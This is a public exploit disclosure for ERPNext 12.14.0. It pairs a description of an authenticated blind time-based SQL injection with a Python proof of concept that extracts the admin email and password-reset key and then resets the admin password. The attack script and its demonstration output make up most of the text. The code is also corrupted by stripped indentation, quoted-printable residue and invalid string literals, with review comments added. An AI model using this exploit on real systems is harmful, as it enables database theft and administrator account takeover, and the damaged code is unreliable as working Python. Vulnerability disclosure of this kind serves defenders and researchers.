Authored by Hodorsec

ERPNext version 12.14.0 suffers from an authenticated remote SQL injection vulnerability.

# Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated)
# Date: 21-01-21
# Exploit Author: Hodorsec
# Vendor Homepage: http://erpnext.org
# Software Link: https://erpnext.org/download
# Version: 12.14.0
# Tested on: Ubuntu 18.04

#!/usr/bin/python3

# AUTHENTICATED SQL INJECTION VULNERABILITY
# In short:
# Found an authenticated SQL injection, reachable as a low-privileged user, because the parameters "or_filters" and "filters" are not sanitized sufficiently. Although several sanitization and blacklist checks are applied to other parameters, these two parameters are not checked. This allows, for example, retrieval of the admin reset token and a reset of the admin account with a new password, as shown in the PoC.
#
# Longer story:
# Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query.
# The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used.
# Initially, the requests were performed using the HTTP POST method, which checks for a CSRF token. However, when the request is converted to an HTTP GET, the CSRF token is neither required nor checked.
# Test environment:
# Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0.
# Cause:
# In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently.

# STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY
# 1. Create account
# 1.a. Use update-password link for created user received via mail
# STEPS INCLUDED IN SCRIPT
# 1. Login using existing low-privileged account
# 2. Use SQL Injection vulnerability in "frappe/frappe/model/db_query/get_list" function, which does not sufficiently sanitize parameters "filters" and "or_filters"
# 3. Retrieve reset key for admin user
# 4. Reset admin account using given password

# DEMONSTRATION
# $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py [email protected] passpass1234@ admin password123411111 http://192.168.252.8/ 2
# [*] Got an authenticated session, continue to perform SQL injection...
# [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table...
# [email protected]
# [*] Retrieved value '[email protected]' for username 'admin' column 'name' in row 1
# [*] Sent reset request for '[email protected]'
# [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table...
# xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX
# [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1
# [+] Retrieved email '[email protected]' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX'
# [+} RESETTED ACCOUNT '[email protected]' WITH NEW PASSWORD 'password123=411111!
#
# [+] Done!

import requests
import urllib3
import os
import sys
import re

# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
# Publish the same value under every proxy environment variable name
# (lower- and upper-case, http and https) in a single update.
os.environ.update(
    dict.fromkeys(("http_proxy", "HTTP_PROXY", "https_proxy", "HTTPS_PROXY"), proxy)
)

# Disable cert warnings
# (the requests in this file are sent with verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set timeout
# Passed as the `timeout=` argument of every HTTP request in this file.
timeout = 30

# Injection prefix and suffix
# NOTE(review): as extracted, both literals contain unescaped nested double
# quotes and are not valid Python; deliberately left untouched in this review.
inj_prefix = "["select(sleep("
inj_suffix = "))))"]"

# Decimal begin and end
# ASCII codes of '0' and '9'; not referenced anywhere in the visible code.
dec_begin = 48
dec_end = 57

# ASCII char begin and end
# Inclusive bounds (space .. '~') of the character codes iterated in get_data.
ascii_begin = 32
ascii_end = 126

# Handle CTRL-C
def keyboard_interrupt():
    """Report a user-requested interrupt and terminate with exit status 0.

    Raises:
        SystemExit: always, with code 0.
    """
    # Start on a fresh line: progress output elsewhere in this file is printed
    # without a trailing newline. The extracted source had a literal "nn" here
    # where the newline escapes lost their backslashes.
    print("\n\n[*] User requested an interrupt, exiting...")
    # sys.exit is always available; the bare `exit` name is only injected by
    # the `site` module and is meant for interactive use.
    sys.exit(0)

# Custom headers
def http_headers():
    """Return the custom HTTP headers sent with every request.

    Returns:
        dict: a new dictionary on each call, containing only a fixed
        ``User-Agent`` value.
    """
    return {'User-Agent': "Mozilla"}

# Get an authenticated session

def get_session(url,headers,email,password):
# Log in with the supplied credentials and return the session object.
#   url      - address the login form data is POSTed to
#   headers  - HTTP headers sent with the request
#   email    - sent as the 'usr' form field
#   password - sent as the 'pwd' form field
# Returns the requests session when the response body contains "full_name";
# otherwise prints an error and exits with status -1.
# NOTE(review): indentation has been stripped from this block in the extracted
# source, so it does not parse as shown.
data = {'cmd':'login',
'usr':email,
'pwd':password,
'device':'desktop'}
session = requests.session()
# NOTE(review): the trailing '=' below looks like a quoted-printable soft line
# break left over from mail/HTML transfer, not Python syntax.
r = session.post(url,headers=headers,data=data,timeout=timeout,=
allow_redirects=True,verify=False)
# "full_name" in the response body is used as the success marker.
if "full_name" in r.text:
return session
else:
print("[!] Unable to get an authenticated session, check credentials...")
exit(-1)

# Perform the SQLi call for injection
def sqli(url,session,headers,inj_str,sleep):
# Send one GET request carrying inj_str in the 'or_filters' parameter and
# classify the response by how long it took.
#   url     - request target
#   session - session object used to send the request
#   headers - HTTP headers sent with the request
#   inj_str - string placed in the 'or_filters' parameter
#   sleep   - threshold in seconds compared against the response time
# Returns True when the elapsed time is >= sleep, False when it is smaller.
# NOTE(review): indentation has been stripped from this block in the extracted
# source, so it does not parse as shown.
# comment_inj_str is only referenced by the commented-out line further down.
comment_inj_str = re.sub(" ","+",inj_str)
inj_params = {'cmd':'frappe.model.db_query.get_list',
'filters':'["idx=1"]',
'or_filters':inj_str,
'fields':'idx',
'doctype':'Report',
'order_by':'idx',
'group_by':'idx'}

# inj_params[param] = comment_inj_str
# NOTE(review): inj_params_unencoded is built but never used afterwards. The
# trailing '=' and the '=20' line look like quoted-printable residue.
inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_para=
ms.items())
=20
# Do GET
r = session.get(url,params=inj_params,headers=headers,timeout=t=
imeout,verify=False)
# Wall-clock duration of the request as reported by requests.
res = r.elapsed.total_seconds()
if res >= sleep:
return True
elif res < sleep:
return False
else:
# NOTE(review): for ordinary numeric values one of the two comparisons above
# is always true, so this branch is effectively unreachable.
print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
exit(-1)

# Loop through positions and characters
def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep):
# Recover one value character by character using the True/False answers
# returned by sqli().
#   url, session, headers - passed through unchanged to sqli()
#   prefix, suffix        - strings wrapped around each generated query string
#   row, column, table    - interpolated into the query text
#   username              - interpolated into the query's WHERE clause
#   sleep                 - delay value embedded in the query and passed to sqli()
# Returns the characters collected so far as a string (possibly empty).
# NOTE(review): indentation has been stripped from this block in the extracted
# source, so it does not parse as shown.
extracted = ""
max_pos_len = 35
# Loop through length of string
# Not very efficient, should use a guessing algorithm
# range(1, max_pos_len) visits positions 1 through max_pos_len - 1.
for pos in range(1,max_pos_len):
# Test if current pos does have any valid value. If not, break
direction = ">"
# NOTE(review): the trailing '=' on the next line looks like a quoted-printable
# soft line break; the statement continues on the line after it.
inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" =
+ direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix
if not sqli(url,session,headers,inj_str,sleep):
break
# Loop through ASCII printable characters
direction = "="
for guess in range(ascii_begin,ascii_end+1):
extracted_char = chr(guess)
inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix
if sqli(url,session,headers,inj_str,sleep):
extracted += chr(guess)
# Echo each character immediately, without a newline, as progress output.
print(extracted_char,end='',flush=True)
break
return extracted


def forgot_password(url,headers,sqli_email):
# POST a password-reset request for the given user.
#   url        - request target
#   headers    - HTTP headers sent with the request
#   sqli_email - sent as the 'user' form field
# Returns the response object when its body contains the confirmation text;
# otherwise falls off the end and returns None implicitly.
# NOTE(review): indentation has been stripped from this block, and the trailing
# '=' characters look like quoted-printable soft line breaks.
data = {'cmd':'frappe.core.doctype.user.user.reset_password',
'user':sqli_email}
# Sent with plain requests.post, i.e. not through an authenticated session.
r = requests.post(url,headers=headers,data=data,verify=False,al=
low_redirects=False,timeout=timeout)
if "Password reset instructions have been sent to your email" in r.text=
:
return r

def reset_account(url,headers,sqli_email,sqli_reset_key,new_password):
# POST an update-password request using a reset key.
#   url            - request target
#   headers        - HTTP headers sent with the request
#   sqli_email     - accepted but not used inside this function
#   sqli_reset_key - sent as the 'key' form field
#   new_password   - sent as the 'new_password' form field
# Returns the response object when the status code is 200; otherwise falls off
# the end and returns None implicitly.
# NOTE(review): indentation has been stripped from this block, and the trailing
# '=' looks like a quoted-printable soft line break.
data = {'key':sqli_reset_key,
'old_password':'',
'new_password':new_password,
'logout_all_sessions':'0',
'cmd':'frappe.core.doctype.user.user.update_password'}
r = requests.post(url,headers=headers,data=data,verify=False,al=
low_redirects=False,timeout=timeout)
if r.status_code == 200:
return r

# Main
def main(argv):
# Parse the command line and run the steps of the script in order:
# get_session, then get_data per column (with forgot_password after the first
# column), then reset_account.
#   argv - accepted but not used; the function reads sys.argv directly.
# Exits with status 0 after printing usage, and with -1 on any failure.
# NOTE(review): indentation has been stripped from this block; '=' at line ends
# and '=20' lines look like quoted-printable residue; a lone 'n' at the start or
# end of several messages looks like a newline escape that lost its backslash.
if len(sys.argv) == 7:
email = sys.argv[1]
password = sys.argv[2]
username = sys.argv[3]
new_password = sys.argv[4]
url = sys.argv[5]
sleep = int(sys.argv[6])
else:
print("[*] Usage: " + sys.argv[0] + " <email_login> <passw_login> <username_to_reset> <new_password> <url> <sleep_in_seconds>")
print("[*] Example: " + sys.argv[0] + " [email protected] passpass1234@ admin password1234@ http://192.168.252.8/ 2n")
exit(0)

# Random headers
# (http_headers() returns a fixed dictionary; nothing is randomized here)
headers = http_headers()

# Sleep divide by 2 due to timing caused by specific DBMS query
# True division: sleep becomes a float from here on.
sleep = sleep / 2

# Optional prefix / suffix
prefix = ""
suffix = ""

# Tables / columns / values
table = 'tabUser'
columns = ['name','reset_password_key']
sqli_email = ""
sqli_reset_key = ""

# Rows
rows = 1

# Do stuff
try:
# Get an authenticated session
session = get_session(url,headers,email,password)
if session:
print("[*] Got an authenticated session, continue to perform SQL injection...")
=20
# Getting values for found rows in specified columns
# Columns are processed in list order, so 'name' is handled before
# 'reset_password_key'.
for column in columns:
print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...")
for row in range(0,rows):
retrieved = get_data(url,session,headers,prefix,suffix,ro=
w,column,table,username,sleep)
print("n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1))
if column == 'name':
sqli_email = retrieved
# Generate a reset token in database
if forgot_password(url,headers,sqli_email):
print("[*] Sent reset request for '" + sqli_email + "'"=
)
else:
print("[!] Something went wrong sending a reset request, check requests or listening mail server...")
exit(-1)
elif column == 'reset_password_key':
sqli_reset_key = retrieved

# Print retrieved values
print("[+] Retrieved email '" + sqli_email + "' and reset key '" + =
sqli_reset_key + "'")

# Reset the desired account
if reset_account(url,headers,sqli_email,sqli_reset_key,new_password=
):
print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'")
else:
print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?")
exit(-1)
=20
# Done
print("n[+] Done!n")
except requests.exceptions.Timeout:
print("[!] Timeout errorn")
exit(-1)
except requests.exceptions.TooManyRedirects:
print("[!] Too many redirectsn")
exit(-1)
except requests.exceptions.ConnectionError:
print("[!] Not able to connect to URLn")
exit(-1)
except requests.exceptions.RequestException as e:
print("[!] " + str(e))
exit(-1)
# NOTE(review): HTTPError is a subclass of RequestException, so the handler
# above already catches it and this clause is never reached. `e.code` is also
# not a standard attribute of requests exceptions - confirm before relying on it.
except requests.exceptions.HTTPError as e:
print("[!] Failed with error code - " + str(e.code) + "n")
exit(-1)
except KeyboardInterrupt:
keyboard_interrupt()
# keyboard_interrupt() exits the process itself, so the next line is not reached.
exit(-1)

# If we were called as a program, go execute the main function.
# NOTE(review): main() does not use the list passed here; it reads sys.argv
# directly. The call below has also lost its indentation in the extracted source.
if __name__ == "__main__":
main(sys.argv[1:])

# Timeline:
# 22-12-20: Sent initial description and PoC via https://erpnext.com/security
# 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications.
# 21-01-21: No response received, public disclosure